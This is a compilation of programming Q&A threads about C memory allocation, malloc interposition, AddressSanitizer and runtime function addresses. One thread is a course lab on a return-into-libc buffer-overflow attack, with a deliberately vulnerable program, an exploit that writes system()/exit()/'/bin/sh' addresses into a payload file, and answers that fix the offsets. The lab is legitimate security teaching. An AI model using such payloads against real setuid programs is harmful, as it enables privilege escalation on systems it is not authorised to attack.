Why replacing malloc causes segment error (__GI__IO_file_overflow) - c

I tried to mimic the way jemalloc replaces ptmalloc by replacing malloc myself, and the replacement resulted in a direct segment error
code1.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
void *ptr = malloc(10);
printf("%p\n", ptr);
return EXIT_SUCCESS;
}
code2.c:
#include <stdlib.h>
#include <stdint.h>
void *malloc(size_t size)
{
return (void *)10;
}
Compile instructions
gcc -c code2.c
ar r libcode2.a code2.o
gcc code1.c -L. -lcode2 -g
gdb
Breakpoint 1, main (argc=1, argv=0x7fffffffe318) at code1.c
17 void *ptr = malloc(10);
(gdb) s
18 printf("%p\n", ptr);
(gdb) p ptr
$1 = (void *) 0xa
(gdb) n
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e46658 in __GI__IO_file_overflow () from /lib64/libc.so.6

the replacement resulted in a direct segment error code1.c
If you replace malloc with a non-functional variant, you better not call any libc functions which may use malloc in their implementation.
Here you called printf, which itself uses malloc internally. Use GDB where command to observe where the crash happened.
I am actually surprised your program made it as far as reaching main() -- I expected it to crash much earlier (there are 1000s of instruction executed long before main is reached).

Related

Library interpositioning

I have been trying to intercept calls to malloc and free, following our textbook (CSAPP book).
I have followed their exact code, and nearly the same code that I found online and I keep getting a segmentation fault. I heard our professor saying something about printf that mallocs and frees memory so I think that this happens because I am intercepting a malloc and since I am using a printf function inside the intercepting function, it will call itself recursively.
However I can't seem to find a solution to solving this problem? Our professor demonstrated that intercepting worked ( he didn't show us the code) and prints our information every time a malloc occurs, so I do know that it's possible.
Can anyone suggest a working method??
Here is the code that I used and get nothing:
mymalloc.c
#ifdef RUNTIME
// Run-time interposition of malloc and free based on // dynamic linker's (ld-linux.so) LD_PRELOAD mechanism #define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h> #include <dlfcn.h>
void *malloc(size_t size) {
static void *(*mallocp)(size_t size) = NULL; char *error;
void *ptr;
// get address of libc malloc
if (!mallocp) {
mallocp = dlsym(RTLD_NEXT, "malloc"); if ((error = dlerror()) != NULL) {
fputs(error, stderr);
exit(EXIT_FAILURE);
}
}
ptr = mallocp(size);
printf("malloc(%d) = %p\n", (int)size, ptr); return ptr;
}
#endif
test.c
#include <stdio.h>
#include <stdlib.h>
int main(){
printf("main\n");
int* a = malloc(sizeof(int)*5);
a[0] = 1;
printf("end\n");
}
The result i'm getting:
$ gcc -o test test.c
$ gcc -DRUNTIME -shared -fPIC mymalloc.c -o mymalloc.so
$ LD_PRELOAD=./mymalloc.so ./test
Segmentation Fault
This is the code that I tried and got segmentation fault (from https://gist.github.com/iamben/4124829):
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
void* malloc(size_t size)
{
static void* (*rmalloc)(size_t) = NULL;
void* p = NULL;
// resolve next malloc
if(!rmalloc) rmalloc = dlsym(RTLD_NEXT, "malloc");
// do actual malloc
p = rmalloc(size);
// show statistic
fprintf(stderr, "[MEM | malloc] Allocated: %lu bytes\n", size);
return p;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define STR_LEN 128
int main(int argc, const char *argv[])
{
char *c;
char *str1 = "Hello ";
char *str2 = "World";
//allocate an empty string
c = malloc(STR_LEN * sizeof(char));
c[0] = 0x0;
//and concatenate str{1,2}
strcat(c, str1);
strcat(c, str2);
printf("New str: %s\n", c);
return 0;
}
The makefile from the git repo didn't work so I manually compiled the files and got:
$ gcc -shared -fPIC libint.c -o libint.so
$ gcc -o str str.c
$ LD_PRELOAD=./libint.so ./str
Segmentation fault
I have been doing this for hours and I still get the same incorrect result, despite the fact that I copied textbook code. I would really appreciate any help!!
One way to deal with this is to turn off the printf when your return is called recursively:
static char ACallIsInProgress = 0;
if (!ACallIsInProgress)
{
ACallIsInProgress = 1;
printf("malloc(%d) = %p\n", (int)size, ptr);
ACallIsInProgress = 0;
}
return ptr;
With this, if printf calls malloc, your routine will merely call the actual malloc (via mallocp) and return without causing another printf. You will miss printing information about a call to malloc that the printf does, but that is generally tolerable when interposing is being used to study the general program, not the C library.
If you need to support multithreading, some additional work might be needed.
The printf implementation might allocate a buffer only once, the first time it is used. In that case, you can initialize a flag that turns off the printf similar to the above, call printf once in the main routine (maybe be sure it includes a nice formatting task that causes printf to allocate a buffer, not a plain string), and then set the flag to turn on the printf call and leave it set for the rest of the program.
Another option is for your malloc routine not to use printf at all but to cache data in a buffer to be written later by some other routine or to write raw data to a file using write, with that data interpreted and formatted by a separate program later. Or the raw data could be written by a pipe to a program that formats and prints it and that is not using your interposed malloc.

How get output of address sanitizer when emiting SIGINT to halt a loop

When I compile this simple test program I get the obvious leak report from address sanitizer, but when I compile the same program but with a infinite loop, and break it emitting SIGINT I don't get any output.
Checking asm output, the malloc is not optimized away (if this is possible at all)
Is this the expected behavior of address sanitizer? I don't encounter this problem in other developments.
Working example:
#include <stdlib.h>
int main(void)
{
char *a = malloc(1024);
return 1;
}
Not working (kill with SIGINT):
#include <stdlib.h>
int main(void)
{
char *a = malloc(1024);
for(;;);
return 1;
}
compile: gcc test.c -o test -fsanitize=address
I encounter this problem in a full programm but I reduced it to this minimal example.
I tried many ways, with exit() and abort() calls, this works:
#include <stdlib.h>
#include <signal.h>
#include <stdio.h>
#include <setjmp.h>
jmp_buf jmpbuf;
void handler (int signum) {
printf("handler %d \n", signum);
// we jump from here to main()
// and then call return
longjmp(jmpbuf, 1);
}
int main(int argc, char *argv[])
{
if (setjmp(jmpbuf)) {
// we are in signal context here
return 2;
}
signal(SIGINT, handler);
signal(SIGTERM, handler);
char *a = malloc(1024);
while (argc - 1);
return 1;
}
Results in:
> gcc file.c -fsanitize=address && timeout 1 ./a.out arg
handler 15
=================================================================
==12970==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1024 byte(s) in 1 object(s) allocated from:
#0 0x7f4798c9bd99 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:86
#1 0x5569e64e0acd in main (/tmp/a.out+0xacd)
#2 0x7f479881206a in __libc_start_main (/usr/lib/libc.so.6+0x2306a)
SUMMARY: AddressSanitizer: 1024 byte(s) leaked in 1 allocation(s).
I guess that the address sanitizer function are executed after main returns.
The code responsible for printing that error output is called as a destructor (fini) procedure. Since your program terminates without calling any of the process destructors (due to the SIGINT), you do not get any error printouts.
__lsan_do_leak_check() can help you avoid using longjmp in #KamilCuk's answer:
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sanitizer/lsan_interface.h>
void handler (int signum) {
__lsan_do_leak_check();
}
int main(int argc, char *argv[])
{
signal(SIGINT, handler);
char *a = malloc(1024);
a=0;
printf("lost pointer\n");
for(;;);
return 1;
}
Demo:
clang test.c -fsanitize=address -fno-omit-frame-pointer -g -O0 -o test && ./test
lost pointer
C-c C-c
=================================================================
==29365==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1024 byte(s) in 1 object(s) allocated from:
#0 0x4c9ca3 in malloc (/home/bjacob/test+0x4c9ca3)
#1 0x4f9187 in main /home/bjacob/test.c:13:14
#2 0x7fbc9898409a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a)
SUMMARY: AddressSanitizer: 1024 byte(s) leaked in 1 allocation(s).
Note I added a=0 to create a leak.
I also added a printf. Without that printf, the leak error is not printed. I suspect the compiler optimized-out the use of the variable "a" despite my using the -O0 compiler option.

Return-into-libc Attack

This is a two part question:
a)I am working with a Return-into-libc attack and not getting a root shell for some reason. I am supposed to take a vulnerable program: retlib.c.
/* retlib.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 128, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
badfile = fopen("badfile", "r");
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
I am using my exploit: exploit_1.c
/* exploit_1.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buf[40];
FILE *badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe86; // "/bin/sh"
*(long *) &buf[16] = 0x40076430; // system()
*(long *) &buf[20] = 0x40069fb0; // exit()
fwrite(buf, 40, 1, badfile);
fclose(badfile);
}
I found the addresses of system and exit using gdb:
(gdb) b main
Breakpoint 1 at 0x80484b7
(gdb) r
Starting program: /home/cs4393/project2/exploit_1
Breakpoint 1, 0x080484b7 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40076430 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x40069fb0 <exit>
(gdb)
I found the /bin/sh address using the myshell.c program:
//myshell.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void main (){
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Than using the commands:
[02/15/2015 21:46] cs4393#ubuntu:~/project2$ export MYSHELL=/bin/sh
[02/15/2015 21:46] cs4393#ubuntu:~/project2$ ./myshell
bffffe86
I feel like I have done everything right, but I keep getting a "Segmentation fault (core dumped)". I am using no -fstack-protector, chmod 4755 and ASLR turned off. Any thoughts on what is wrong?
b) I am also working with retlib-env.c:
/*retlib-env.c*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 128, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
char* shell=getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int)shell);
badfile = fopen("badfile", "r");
//system(shell);
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
This seems to me to be similar to part a, but "In this example, the vulnerable program retlib-env.c will reference MYSHELL environment." I don't know what I need to add to my exploit to make it work. Any hints or nudges in the right direction would be really helpful. I have MYSHELL, but i'm not really sure how I need to reference it to exploit the retlib-env.c. Shouldn't it be pretty similar to part a?
Probably the addresses of functions system(), exit() etc change at every program invocation. You cannot rely on loadng the pogram, degbugging for these addresses, closing the debug session and running the program again as the perogram may have been loaded at a completely different starting address the second time.
$gdb -q retlib
You need to find system and exit address of retlib not exploit. Exploit only prepare a exploit file. Retlib reads this file till buffer overflow. As far as I know the system address segment should start 12 after the buffer that means it will be buf[24].
The length of the program's name will influence the address of the environment variables in the stack. To get the correct address of string /bin/sh, you should keep the length of the program to search /bin/sh (i.e. myshell) equals the length of your final attack program (i.e. retlib).
Besides, you need to find out the return frame address which is supposed to be 4 plus the distance between ebp and &buffer in bof, which is supposed to be 20+4=24 rather than 16 in your code. You can verifiy it by gdb on the program compiled with flag -g.

Using pthreads and malloc

I asked a question Using sockets in multithread server yesterday. In this question I described segmentation fault under Solaris in multithreaded server. Now I have found the core of error and written code, that shortly demonstrates it:
#include <stdlib.h>
#include <pthread.h>
int main(int argc, char *argv[])
{
pthread_attr_t *attr;
attr = (pthread_attr_t *)malloc(sizeof(pthread_attr_t));
pthread_attr_setdetachstate(attr, PTHREAD_CREATE_DETACHED);
malloc(0);
malloc(0); //Segmentation fault there
return 0;
}
Second malloc crashes with Segmentation fault.
While this code executes normally:
#include <stdlib.h>
#include <pthread.h>
int main(int argc, char *argv[])
{
pthread_attr_t *attr;
attr = (pthread_attr_t *)malloc(sizeof(pthread_attr_t));
// pthread_attr_setdetachstate(attr, PTHREAD_CREATE_DETACHED);
malloc(0);
malloc(0);
return 0;
}
Could you please explain the reason of the error?
P.S.: I compile with gcc -pthreads -lpthread -D_REENTRANT keys.
From the docs on pthread_attr_setdetachstate():
The behavior is undefined if the value specified by the attr argument to pthread_attr_getdetachstate() or pthread_attr_setdetachstate() does not refer to an initialized thread attributes object.
It's possible that the pthread_attr_t object the attr argument points to contains a pointer to some state maintained by the pthreads library. If it hasn't been initialized, that pointer would be garbage so the pthread_attr_setdetachstate() call might corrupt the heap.
See the pthread_attr_init() function to see how to properly initialize the attributes object.

Find program's code address at runtime?

When I use gdb to debug a program written in C, the command disassemble shows the codes and their addresses in the code memory segmentation. Is it possible to know those memory addresses at runtime? I am using Ubuntu OS. Thank you.
[edit] To be more specific, I will demonstrate it with following example.
#include <stdio.h>
int main(int argc,char *argv[]){
myfunction();
exit(0);
}
Now I would like to have the address of myfunction() in the code memory segmentation when I run my program.
Above answer is vastly overcomplicated. If the function reference is static, as it is above, the address is simply the value of the symbol name in pointer context:
void* myfunction_address = myfunction;
If you are grabbing the function dynamically out of a shared library, then the value returned from dlsym() (POSIX) or GetProcAddress() (windows) is likewise the address of the function.
Note that the above code is likely to generate a warning with some compilers, as ISO C technically forbids assignment between code and data pointers (some architectures put them in physically distinct address spaces).
And some pedants will point out that the address returned isn't really guaranteed to be the memory address of the function, it's just a unique value that can be compared for equality with other function pointers and acts, when called, to transfer control to the function whose pointer it holds. Obviously all known compilers implement this with a branch target address.
And finally, note that the "address" of a function is a little ambiguous. If the function was loaded dynamically or is an extern reference to an exported symbol, what you really get is generally a pointer to some fixup code in the "PLT" (a Unix/ELF term, though the PE/COFF mechanism on windows is similar) that then jumps to the function.
If you know the function name before program runs, simply use
void * addr = myfunction;
If the function name is given at run-time, I once wrote a function to find out the symbol address dynamically using bfd library. Here is the x86_64 code, you can get the address via find_symbol("a.out", "myfunction") in the example.
#include <bfd.h>
#include <stdio.h>
#include <stdlib.h>
#include <type.h>
#include <string.h>
long find_symbol(char *filename, char *symname)
{
bfd *ibfd;
asymbol **symtab;
long nsize, nsyms, i;
symbol_info syminfo;
char **matching;
bfd_init();
ibfd = bfd_openr(filename, NULL);
if (ibfd == NULL) {
printf("bfd_openr error\n");
}
if (!bfd_check_format_matches(ibfd, bfd_object, &matching)) {
printf("format_matches\n");
}
nsize = bfd_get_symtab_upper_bound (ibfd);
symtab = malloc(nsize);
nsyms = bfd_canonicalize_symtab(ibfd, symtab);
for (i = 0; i < nsyms; i++) {
if (strcmp(symtab[i]->name, symname) == 0) {
bfd_symbol_info(symtab[i], &syminfo);
return (long) syminfo.value;
}
}
bfd_close(ibfd);
printf("cannot find symbol\n");
}
To get a backtrace, use execinfo.h as documented in the GNU libc manual.
For example:
#include <execinfo.h>
#include <stdio.h>
#include <unistd.h>
void trace_pom()
{
const int sz = 15;
void *buf[sz];
// get at most sz entries
int n = backtrace(buf, sz);
// output them right to stderr
backtrace_symbols_fd(buf, n, fileno(stderr));
// but if you want to output the strings yourself
// you may use char ** backtrace_symbols (void *const *buffer, int size)
write(fileno(stderr), "\n", 1);
}
void TransferFunds(int n);
void DepositMoney(int n)
{
if (n <= 0)
trace_pom();
else TransferFunds(n-1);
}
void TransferFunds(int n)
{
DepositMoney(n);
}
int main()
{
DepositMoney(3);
return 0;
}
compiled
gcc a.c -o a -g -Wall -Werror -rdynamic
According to the mentioned website:
Currently, the function name and offset only be obtained on systems that use the ELF
binary format for programs and libraries. On other systems, only the hexadecimal return
address will be present. Also, you may need to pass additional flags to the linker to
make the function names available to the program. (For example, on systems using GNU
ld, you must pass (-rdynamic.)
Output
./a(trace_pom+0xc9)[0x80487fd]
./a(DepositMoney+0x11)[0x8048862]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(main+0x1d)[0x80488a4]
/lib/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7e16775]
./a[0x80486a1]
About a comment in an answer (getting the address of an instruction), you can use this very ugly trick
#include <setjmp.h>
void function() {
printf("in function\n");
printf("%d\n",__LINE__);
printf("exiting function\n");
}
int main() {
jmp_buf env;
int i;
printf("in main\n");
printf("%d\n",__LINE__);
printf("calling function\n");
setjmp(env);
for (i=0; i < 18; ++i) {
printf("%p\n",env[i]);
}
function();
printf("in main again\n");
printf("%d\n",__LINE__);
}
It should be env[12] (the eip), but be careful as it looks machine dependent, so triple check my word. This is the output
in main
13
calling function
0xbfff037f
0x0
0x1f80
0x1dcb
0x4
0x8fe2f50c
0x0
0x0
0xbffff2a8
0xbffff240
0x1f
0x292
0x1e09
0x17
0x8fe0001f
0x1f
0x0
0x37
in function
4
exiting function
in main again
37
have fun!

Resources